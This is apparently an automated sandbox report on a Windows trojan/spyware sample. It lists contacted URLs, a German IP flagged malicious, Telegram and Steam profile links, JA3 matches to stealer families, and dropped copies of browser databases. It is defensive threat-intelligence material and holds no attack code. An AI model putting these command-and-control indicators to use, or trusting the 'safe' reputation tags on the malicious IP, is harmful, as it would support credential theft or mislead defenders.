https://95.217.30.53MC	Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/:	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/	chrome.exe, 00000008.00000002.1475051363.00001ECC02BB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478092354.00001ECC03534000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477058236.00001ECC0334C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_crunchyroll&downloadmode	Cm2GRjWK1C.exe	false		high
http://unisolated.invalid/	chrome.exe, 00000008.00000002.1476022271.00001ECC02FD8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl	chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 00000008.00000002.1476937486.00001ECC032E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475974465.00001ECC02F94000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475565347.00001ECC02DA4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dl.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 00000008.00000002.1472080608.00001ECC022E8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_peacock&downloadmode=1&p	Cm2GRjWK1C.exe	false		high
https://app-api-d1.dvdfab.cn/api/	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://finn.no	chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	false		high
https://app-api-j1.dvdfab.cn/api/	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://dl.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://d17.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://dr.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/?feature=ytca	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	false		high
https://www.google.com/chrome/browser-tools/	chrome.exe, 00000008.00000002.1474964004.00001ECC02B8C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_paravi&downloadmode=1&pi	Cm2GRjWK1C.exe	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_youtube-movies&downloadm	Cm2GRjWK1C.exe	false		high
https://chrome.google.com/webstore	chrome.exe, 00000008.00000003.1417523038.00001ECC036EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472304064.00001ECC02378000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474605622.00001ECC02AF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.217.30.53/zD	Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dr.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://sitescout.com	chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	x4wbi5.0.dr	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	false		high
https://app-api-j1.dvdfab.cn/api/JPNhttps://app-api-c1.dvdfab.cn/api/ENUhttps://app-api-d1.dvdfab.cn	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://dl.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://app-api-d1.dvdfab.cn/api/common_json_post/	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_joyn&downloadmode=1&pid=	Cm2GRjWK1C.exe	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000008.00000002.1476576882.00001ECC0315C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475840951.00001ECC02ED8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://plus.google.com	chromecache_69.9.dr	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	false		high
https://t.me/l793oy	Cm2GRjWK1C.exe, 00000000.00000003.1676784292.0000000003022000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676587237.0000000003001000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000008.00000002.1475427035.00001ECC02D38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475797064.00001ECC02EB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478576439.00001ECC036D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_disney-plus&downloadmode	Cm2GRjWK1C.exe	false		high
https://d223.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://chromewebstore.google.com/	chrome.exe, 00000008.00000002.1472304064.00001ECC02378000.00000004.00001000.00020000.00000000.sdmp	false		high
https://app-api-j1.dvdfab.cn/api/common_json_post/https://app-api-d1.dvdfab.cn/api/common_json_post/	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://mail.google.com/chat/download?usp=chrome_defaultle	chrome.exe, 00000008.00000002.1476986237.00001ECC03310000.00000004.00001000.00020000.00000000.sdmp	false		high
https://test-app-api.dvdfab.cn/api/	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://www.dvdfab.cn/thankyou.htm?s=playerfab&ad=playerfab_client_thankyou&v=	Cm2GRjWK1C.exe	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	x4wbi5.0.dr	false		high
https://gemini.google.com/glic/intro?	chrome.exe, 00000008.00000003.1418774683.00001ECC03D60000.00000004.00001000.00020000.00000000.sdmp	false		high
https://d207.dvdfab.cn/download/12_7051_c2751989/playerfab_x64_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://tailtarget.com	chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.unicode.org/copyright.html	chrome.exe, 00000008.00000002.1464503636.00000241BDDD2000.00000002.00000001.00040000.00000010.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://d171.dvdf	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000008.00000003.1417500053.00001ECC03698000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1390410228.00001ECC036EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417523038.00001ECC036EC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://d18.dvdfab.cn/download/31_7051_c2b57a7c/playerfab_7051.exe	Cm2GRjWK1C.exe	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/:	chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/video-enhancer-ai.htm	Cm2GRjWK1C.exe	false		high
https://lens.google.com/gen204	chrome.exe, 00000008.00000003.1394242037.00001ECC03814000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417797321.00001ECC02728000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	Cm2GRjWK1C.exe	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472882586.00001ECC02584000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473665659.00001ECC027D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475999818.00001ECC02FC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473729232.00001ECC02874000.00000004.00001000.00020000.00000000.sdmp, x4wbi5.0.dr	false		high
https://95.217.30.53/)CMA	Cm2GRjWK1C.exe, 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000008.00000002.1473241743.00001ECC025E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://worldhistory.org	chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged	chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherUrlList	chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	false		high
https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW	chrome.exe, 00000008.00000002.1477095136.00001ECC03394000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475840951.00001ECC02ED8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://policies.google.com/	chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp, chrome.exe, 00000008.00000002.1475718665.00001ECC02E50000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394098825.00001ECC033F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seedtag.com	chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	false		high
https://apis.google.com	chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp, chromecache_69.9.dr, chromecache_71.9.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_espn-plus&downloadmode=1	Cm2GRjWK1C.exe	false		high
https://labs.google.com/search?source=ntp	chrome.exe, 00000008.00000002.1473241743.00001ECC025E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.dvdfab.cn/bad_package.htm?s=	Cm2GRjWK1C.exe	false		high
https://95.217.30.53hellohttps://t.me/l793oyir7amMozilla/5.0	Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://domains.google.com/suggest/flow	chromecache_69.9.dr	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199829660832ir7amMozilla/5.0	Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States	15169	GOOGLEUS	false
142.250.185.206	play.google.com	United States	15169	GOOGLEUS	false
95.217.30.53	unknown	Germany	24940	HETZNER-ASDE	true
142.250.185.142	plus.l.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1639254
Start date and time:	2025-03-15 08:28:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Cm2GRjWK1C.exe renamed because original name is a hash value
Original Sample Name:	9a6088f8f1880ab2d28748fed448b4bc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/24@6/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 75 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.77.188, 142.250.184.238, 142.250.181.227, 142.250.74.206, 142.251.5.84, 142.250.185.110, 142.250.184.206, 172.217.18.3, 142.250.185.170, 142.250.186.106, 142.250.185.106, 172.217.16.202, 142.250.184.234, 142.250.186.74, 216.58.212.170, 142.250.184.202, 142.250.185.138, 142.250.185.234, 142.250.186.170, 216.58.206.42, 142.250.185.202, 142.250.181.234, 142.250.186.138, 142.250.186.42, 142.250.185.238, 23.199.214.10, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, ogads-pa.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	hgfs.arm5.elf	Get hash	malicious	Unknown	Browse	144.78.165.104
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	eF5TnJ6Frr.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	dxRwXy19pq.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	12321321.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	file.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	file.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	tKBxw8eOIV.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	tKBxw8eOIV.exe	Get hash	malicious	Socks5Systemz	Browse	95.217.30.53
	xn3nGSFdRn.exe	Get hash	malicious	Vidar	Browse	95.217.30.53
	soft.exe	Get hash	malicious	GCleaner, LummaC Stealer, Socks5Systemz	Browse	95.217.30.53

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\gdjmoz

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\jw4wb168q

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\ng4eus

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\ozuaim

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, file counter 6, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	0.4792253015780342
Encrypted:	false
SSDEEP:	96:xWpdkG7xQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:ApdkG77IqL/tH+bF+UI3i67Kylj9
MD5:	33642526D21BAF34FB5D5AAF11B3FB91
SHA1:	A64B4A7605D8B449C085474A3484921975EF6C14
SHA-256:	3ED06184837C7FF625C54589CA2037F127E0525E3541DE8960A9D5503625862B
SHA-512:	A013359FCBAC1005653793D3FF6398E32746E2F6FFCDA26AA3C9EB96279F7A2E989E05B5B8D2510EAF5F93DDD6281A71773DA81C472FCC71AD74315353948782
Malicious:	false
Preview:	SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\vaim7g

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\dba1d\w4wb168q1

Download File

Process:	C:\Users\user\Desktop\Cm2GRjWK1C.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dba1d\x4wbi5

Download File

